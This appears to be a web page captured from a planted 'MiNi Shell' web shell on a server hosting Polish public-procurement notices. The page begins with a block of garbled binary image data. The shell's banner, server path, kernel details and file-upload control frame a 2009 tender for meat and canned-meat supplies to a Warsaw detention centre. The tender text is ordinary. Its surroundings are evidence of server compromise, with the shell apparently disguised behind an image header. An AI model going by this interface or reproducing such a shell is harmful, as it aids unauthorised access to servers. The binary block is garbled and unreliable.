JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090415/106288-N-2009.html

<p class="kh_header"><b>Warszawa: Przetarg nieograniczony na dostawy mięsa i produktów mięsnych do Aresztu Śledczego w Warszawie - Służewcu Nr 220/2P/09</b><br>
<b>Numer ogłoszenia: 106288 - 2009; data zamieszczenia: 15.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy Warszawa Służewiec , ul. Kłobucka 5, 02-699 Warszawa, woj. mazowieckie, tel. 022 8473341, faks 022 8437366.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawy mięsa i produktów mięsnych do Aresztu Śledczego w Warszawie - Służewcu Nr 220/2P/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A 



L. p.	

Przedmiot 
zamówienia	

Kod 
CPV	

Polska 
Norma	
Orientacyjna ilość w kilogramach
	
Wymagany minimalny termin 
do spożycia 
od dnia dostawy


1.
	
Kaszanka	
15131134-3	
PN-A-82007/A1:1998	
6 700	
48 godzin

2.
	
Salceson czarny	
15131134-3	
PN-A-82007/A1:1998	
2 900	
48 godzin

3.
	
Salceson włoski	
15131133-6	
PN-A-82007/A1:1998	
2 900	
48 godzin

4.
	
Salceson wiejski czosnkowy	
15131133-6	
PN-A-82007/A1:1998
	
5 600	
48 godzin

5.
	
Salceson ozorkowy	
15131134-3	
PN-A-82007/A1:1998
	
2 000	
48 godzin

6.
	
Pasztetowa	
15130000-8	
PN-A-82007/A1:1998
	
2 900	
48 godzin

7.
	
Pasztet mięsny	
15131310-1	
PN-A-82012:1996	
5 400	
48 godzin

8.
	
Pasztet drobiowy	
15131310-1	
PN-A-86526:1995/Az2:2000
	
2 900	
48 godzin

9.
	
Kiełbasa biała parzona	
15131130-5	
PN-A-82007:1996/Az1:1998
	
2 600	
4 dni

10.
	
Mortadela	
15131130-5	
PN-A-82007:1996/Az1:1998
	
5 500	
5 dni

11.
	
Parówkowa	
15131130-5	
PN-A-82007:1996/Az1:1998
	
 2900	
5 dni

12.
	
Parówki wieprzowe cienkie	
15131130-5	
PN-A-82007:1996/Az1:1998
	
3 000	
5 dni

13.
	
Kiełbasa litewska	
15131130-5	
PN-A-82007:1996/Az1:1998
	
2 150	
5 dni

14.
	
Kiełbasa podwawelska	
15131130-5	
PN-A-82007:1996/Az1:1998
	
1 500	
5 dni

15.
	
Kiełbasa zwyczajna	
15131130-5	
PN-A-82007:1996/Az1:1998	
2 900	
5 dni

16.
	
Lunch meat	
1531130-5	
PN-A-82007:1996/Az1:1998	
5 600	
5 dni

17.
	
Pieczeń rzymska	
15131100-6	
PN-A-82012:1996	
5 700	
5 dni

18.
	
Boczek faszerowany	
15131133-6	
PN-A-82007:1996/Az1:1998	
1 800	
5 dni

19.
	
Mielonka wieprzowa	
15131133-6	
PN-A-82007:1996/Az1:1998	
2 900	
4 dni

20.
	
Kiełbasa szynkowa wierpzowa
	
15131133-6	
PN-A-82007:1996/Az1:1998	

1 300	
5 dni

21.
	
Kiełbasa zielonogórska	
15131130-5	
PN-A-82007:1996/Az1:1998	
1 500	
5 dni

22.
	
Kiełbasa krakowska parzona
	
15131130-5	
PN-A-82007:1996/Az1:1998	

1 500	
5 dni

23.
	
Kiełbasa kanapkowa drobiowa
	
15131135-0	
PN-A-86526:1995/Az2:2000	

5 600	
5 dni

24.
	
Polędwica miodowa drobiowa
	
15131135-0	
PN-A-86526:1995/Az2:2000	

1 500	
5 dni

25.
	
Kiełbasa drobiowa cienka
	
15131135-0	
PN-A-86526:1995/Az2:2000	
6 700	
5 dni

26.
	
Mielonka drobiowa	
15131135-0	
PN-A-86526:1995/Az2:2000	
4 750	
5 dni

27.
	
Parówki drobiowe	
15131135-0	
PN-A-86526:1995/Az2:2000	
7 900	
5 dni

28.
	
Baleron drobiowy	
15131135-0	
PN-A-86526:1995/Az2:2000	
1 500	
5 dni

29.
	
Polędwica drobiowa	
15131135-0	
PN-A-86526:1995/Az2:2000	
1 500	
5 dni

30.
	
Serdelki drobiowe	
15131135-0	
PN-A-86526:1995/Az2:2000	
6 800	
5 dni

31.
	
Szynka drobiowa	
15131135-0	
PN-A-86526:1995/Az2:2000	
2 000	
5 dni

32.
	
Szynka mielona drobiowa
	
15131135-0	
PN-A-86526:1995/Az2:2000	

6 900	
5 dni

33.
	
Piersi z kurczaka - filet	
15112210-1	
	
2 800	
3 dni

34.
	
Udziec z kurczaka	
15112210-1	
	
5 900	
3 dni

35.
	
Wątroba wieprzowa	
15114000-0	
PN-A-82004:1986	
5 000	
48 godzin

36.
	
Wątróbki drobiowe	
15122300-9	
	
350	
48 godzin

37.
	
Nerki wieprzowe	
15131400-9	
PN-A-82004:1986	
200	
48 godzin

38.
	
Serca wieprzowe	
15131400-9	
PN-A-82004:1986	
2 600	
48 godzin

39.
	
Serca drobiowe	
15112200-8	
	
3 200	
48 godzin

40.
	
Kości wołowe	
15100000-9	
	
12 900	
4 dni

41.
	
Żeberka wieprzowe (paski)
	
15113000-3	
PN-A-82002:1986	

4 800	
3 dni

42.
	
Boczek surowy b/k	
15113000-3	
PN-A-82002:1986	
1 100	
5 dni

43.
	
Boczek wędzony bez żeber
	
15113000-3	
PN-A-82007:1996/Az1:1998	

1 850	
5 dni

44.
	
Karkówka	
15113000-3	
PN-A-82002:1986	
2 700	
4 dni

45.
	
Mięso wieprzowe
kl. II b/k
	
15113000-3	
PN-A-82000:1965	
1 800	
4 dni

46.
	
Mięso wołowe
kl. II b/k
	
15111000-9	
PN-A-82000:1965	
11 000	
4 dni

47.
	
Mięso mielone wieprzowo-wołowe (skład 50/50 b/dodatków)
	
15130000-8	
PN-A-82009/A1:1998	

6 800	
3 dni

48.
	
Mięso wołowe b/k
z łopatki	
15111100-0	
PN-A-
82003:1998/Ap1:2004	
2 700	
4 dni

49.
	
Słonina świeża 
bez skóry
	
15412100-0	
PN-A-82002:1986	
2 900	
5 dni

50.
	
Smalec	
15412100-0	
PN-A-82002:1986	
2 600	
7 dni

51.
	
Kiełbasa szynkowa wołowa
	
15131132-9	
PN-A-82007:1996/Az1:1998	
1 200	
5 dni

52.
	
Pieczeń drobiowa	
1513110-6	
PN-A-82012:1996	
2 700	
5 dni

53.
	
Udka z kurczaka (ćwiartka waga ok. 250g)
	
15112210-1	
	
1 200	
3 dni




Część B



L. p.	

Przedmiot 
zamówienia	

Kod 
CPV	

Polska 
Norma	
Orientacyjna ilość w kilogramach
	
Wymagany minimalny termin 
do spożycia 
od dnia dostawy



1.	Konserwa turystyczna mięsna (puszka z otwieraczem; masa netto jednej puszki 
od 280 do 330 gram)	

15131000-5
	
PN-A-82022:1998/Az1:2000	

4 100	

2 miesiące

2.	Smalec z mięsem (alopak; masa netto jednego opakowania 
od 280 do 330 gram)	
15131000-5	
PN-A-82022:1998/Az1:2000	
2 100	
2 miesiące

3.	Pasztet mięsny (puszka z otwieraczem; masa netto jednej puszki 
od 280 do 330 gram)	
15131000-5	
PN-A-82022:1998/Az1:2000	
4 100	
2 miesiące

4.	Pasztet drobiowy (alopak; masa netto jednego opakowania - 50 gram)	
15131000-5	
PN-A-86525:1996/Az1:2000	
1 700	
2 miesiące.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.34-3, 15.13.11.33-6, 15.13.00.00-8, 15.13.13.10-1, 15.13.11.30-5, 15.13.11.00-6, 15.13.11.35-0, 15.11.22.10-1, 15.11.40.00-0, 15.12.23.00-9, 15.13.14.00-9, 15.11.22.00-8, 15.10.00.00-9, 15.11.30.00-3, 15.11.10.00-9, 15.13.00.00-8, 15.11.11.00-0, 15.41.21.00-0, 15.13.11.32-9, 15.13.11.00-6, 15.13.10.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> część A zamówienia - 8000 PLN
część B zamówienia - 1000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:
1) 	Spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych:
2) 	Nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> IX. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu

1. Oświadczenie o spełnianiu przez Wykonawcę warunków udziału w postępowaniu zgodnie z art. 22 i art. 24 ustawy Prawo zamówień publicznych - załącznik nr 2.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewi-dencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do re-jes-tru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 mie-sięcy przed upływem terminu składania ofert;
3. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Spo-łecz-nego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem po-datków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświad-czeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześ-niej niż 3 miesiące przed upływem terminu składania ofert;
4. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6. 	Pełnomocnictwo dla pełnomocnika reprezentującego Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli zachodzi taka okoliczność.
7. 	Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
Wykaz żądanych dokumentów, poza wymaganymi ustawowo, jakie powinien dołączyć wykonawca: 

1.    Aktualne zezwolenie (decyzja) właściwego organu Państwowej Inspekcji Sani-tarnej, stwierdzające spełnienie wymagań koniecznych do zapewnienia higie-ny w procesie produkcji lub w obrocie oraz zapewnienia właściwej jakości zdrowotnej - dot. przedsiębiorstw produkcyjnych lub wprowadzających do obrotu żywność będącą pod nadzorem PIS - jeżeli ustawy nakładają obo-wią-zek posiadania takich uprawnień; 

2.	Aktualne zezwolenie (decyzja) powiatowego lekarza weterynarii, właściwego ze względu na miejsce produkcji, dopuszczające zakład w zakresie prowa-dzonej działalności do produkcji - dot. produktów będących pod nadzorem Inspekcji Weterynaryjnej - jeżeli ustawy nakładają obowiązek posiadania ta-kich uprawnień..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy w Warszawie - Służewcu;
ul. Kłobucka 5;
02-699 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 10:00, miejsce: sekretariat Aresztu Śledczego w Warszawie - Służewcu;
ul. Kłobucka 5; 02-699 Warszawa.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część A 



L. p.	

Przedmiot 
zamówienia	

Kod 
CPV	

Polska 
Norma	
Orientacyjna ilość w kilogramach
	
Wymagany minimalny termin 
do spożycia 
od dnia dostawy


1.
	
Kaszanka	
15131134-3	
PN-A-82007/A1:1998	
6 700	
48 godzin

2.
	
Salceson czarny	
15131134-3	
PN-A-82007/A1:1998	
2 900	
48 godzin

3.
	
Salceson włoski	
15131133-6	
PN-A-82007/A1:1998	
2 900	
48 godzin

4.
	
Salceson wiejski czosnkowy	
15131133-6	
PN-A-82007/A1:1998
	
5 600	
48 godzin

5.
	
Salceson ozorkowy	
15131134-3	
PN-A-82007/A1:1998
	
2 000	
48 godzin

6.
	
Pasztetowa	
15130000-8	
PN-A-82007/A1:1998
	
2 900	
48 godzin

7.
	
Pasztet mięsny	
15131310-1	
PN-A-82012:1996	
5 400	
48 godzin

8.
	
Pasztet drobiowy	
15131310-1	
PN-A-86526:1995/Az2:2000
	
2 900	
48 godzin

9.
	
Kiełbasa biała parzona	
15131130-5	
PN-A-82007:1996/Az1:1998
	
2 600	
4 dni

10.
	
Mortadela	
15131130-5	
PN-A-82007:1996/Az1:1998
	
5 500	
5 dni

11.
	
Parówkowa	
15131130-5	
PN-A-82007:1996/Az1:1998
	
 2900	
5 dni

12.
	
Parówki wieprzowe cienkie	
15131130-5	
PN-A-82007:1996/Az1:1998
	
3 000	
5 dni

13.
	
Kiełbasa litewska	
15131130-5	
PN-A-82007:1996/Az1:1998
	
2 150	
5 dni

14.
	
Kiełbasa podwawelska	
15131130-5	
PN-A-82007:1996/Az1:1998
	
1 500	
5 dni

15.
	
Kiełbasa zwyczajna	
15131130-5	
PN-A-82007:1996/Az1:1998	
2 900	
5 dni

16.
	
Lunch meat	
1531130-5	
PN-A-82007:1996/Az1:1998	
5 600	
5 dni

17.
	
Pieczeń rzymska	
15131100-6	
PN-A-82012:1996	
5 700	
5 dni

18.
	
Boczek faszerowany	
15131133-6	
PN-A-82007:1996/Az1:1998	
1 800	
5 dni

19.
	
Mielonka wieprzowa	
15131133-6	
PN-A-82007:1996/Az1:1998	
2 900	
4 dni

20.
	
Kiełbasa szynkowa wierpzowa
	
15131133-6	
PN-A-82007:1996/Az1:1998	

1 300	
5 dni

21.
	
Kiełbasa zielonogórska	
15131130-5	
PN-A-82007:1996/Az1:1998	
1 500	
5 dni

22.
	
Kiełbasa krakowska parzona
	
15131130-5	
PN-A-82007:1996/Az1:1998	

1 500	
5 dni

23.
	
Kiełbasa kanapkowa drobiowa
	
15131135-0	
PN-A-86526:1995/Az2:2000	

5 600	
5 dni

24.
	
Polędwica miodowa drobiowa
	
15131135-0	
PN-A-86526:1995/Az2:2000	

1 500	
5 dni

25.
	
Kiełbasa drobiowa cienka
	
15131135-0	
PN-A-86526:1995/Az2:2000	
6 700	
5 dni

26.
	
Mielonka drobiowa	
15131135-0	
PN-A-86526:1995/Az2:2000	
4 750	
5 dni

27.
	
Parówki drobiowe	
15131135-0	
PN-A-86526:1995/Az2:2000	
7 900	
5 dni

28.
	
Baleron drobiowy	
15131135-0	
PN-A-86526:1995/Az2:2000	
1 500	
5 dni

29.
	
Polędwica drobiowa	
15131135-0	
PN-A-86526:1995/Az2:2000	
1 500	
5 dni

30.
	
Serdelki drobiowe	
15131135-0	
PN-A-86526:1995/Az2:2000	
6 800	
5 dni

31.
	
Szynka drobiowa	
15131135-0	
PN-A-86526:1995/Az2:2000	
2 000	
5 dni

32.
	
Szynka mielona drobiowa
	
15131135-0	
PN-A-86526:1995/Az2:2000	

6 900	
5 dni

33.
	
Piersi z kurczaka - filet	
15112210-1	
	
2 800	
3 dni

34.
	
Udziec z kurczaka	
15112210-1	
	
5 900	
3 dni

35.
	
Wątroba wieprzowa	
15114000-0	
PN-A-82004:1986	
5 000	
48 godzin

36.
	
Wątróbki drobiowe	
15122300-9	
	
350	
48 godzin

37.
	
Nerki wieprzowe	
15131400-9	
PN-A-82004:1986	
200	
48 godzin

38.
	
Serca wieprzowe	
15131400-9	
PN-A-82004:1986	
2 600	
48 godzin

39.
	
Serca drobiowe	
15112200-8	
	
3 200	
48 godzin

40.
	
Kości wołowe	
15100000-9	
	
12 900	
4 dni

41.
	
Żeberka wieprzowe (paski)
	
15113000-3	
PN-A-82002:1986	

4 800	
3 dni

42.
	
Boczek surowy b/k	
15113000-3	
PN-A-82002:1986	
1 100	
5 dni

43.
	
Boczek wędzony bez żeber
	
15113000-3	
PN-A-82007:1996/Az1:1998	

1 850	
5 dni

44.
	
Karkówka	
15113000-3	
PN-A-82002:1986	
2 700	
4 dni

45.
	
Mięso wieprzowe
kl. II b/k
	
15113000-3	
PN-A-82000:1965	
1 800	
4 dni

46.
	
Mięso wołowe
kl. II b/k
	
15111000-9	
PN-A-82000:1965	
11 000	
4 dni

47.
	
Mięso mielone wieprzowo-wołowe (skład 50/50 b/dodatków)
	
15130000-8	
PN-A-82009/A1:1998	

6 800	
3 dni

48.
	
Mięso wołowe b/k
z łopatki	
15111100-0	
PN-A-
82003:1998/Ap1:2004	
2 700	
4 dni

49.
	
Słonina świeża 
bez skóry
	
15412100-0	
PN-A-82002:1986	
2 900	
5 dni

50.
	
Smalec	
15412100-0	
PN-A-82002:1986	
2 600	
7 dni

51.
	
Kiełbasa szynkowa wołowa
	
15131132-9	
PN-A-82007:1996/Az1:1998	
1 200	
5 dni

52.
	
Pieczeń drobiowa	
1513110-6	
PN-A-82012:1996	
2 700	
5 dni

53.
	
Udka z kurczaka (ćwiartka waga ok. 250g)
	
15112210-1	
	
1 200	
3 dni.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.34-3, 15.13.11.33-6, 15.13.00.00-8, 15.13.13.10-1, 15.13.11.30-5, 15.13.11.00-6, 15.11.22.10-1, 15.11.40.00-0, 15.12.23.00-9, 15.13.14.00-9, 15.11.22.00-8, 15.10.00.00-9, 15.11.30.00-3, 15.11.10.00-9, 15.13.00.00-8, 15.11.11.00-0, 15.13.11.32-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część B



L. p.	

Przedmiot 
zamówienia	

Kod 
CPV	

Polska 
Norma	
Orientacyjna ilość w kilogramach
	
Wymagany minimalny termin 
do spożycia 
od dnia dostawy



1.	Konserwa turystyczna mięsna (puszka z otwieraczem; masa netto jednej puszki 
od 280 do 330 gram)	

15131000-5
	
PN-A-82022:1998/Az1:2000	

4 100	

2 miesiące

2.	Smalec z mięsem (alopak; masa netto jednego opakowania 
od 280 do 330 gram)	
15131000-5	
PN-A-82022:1998/Az1:2000	
2 100	
2 miesiące

3.	Pasztet mięsny (puszka z otwieraczem; masa netto jednej puszki 
od 280 do 330 gram)	
15131000-5	
PN-A-82022:1998/Az1:2000	
4 100	
2 miesiące

4.	Pasztet drobiowy (alopak; masa netto jednego opakowania - 50 gram)	
15131000-5	
PN-A-86525:1996/Az1:2000	
1 700	
2 miesiące.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com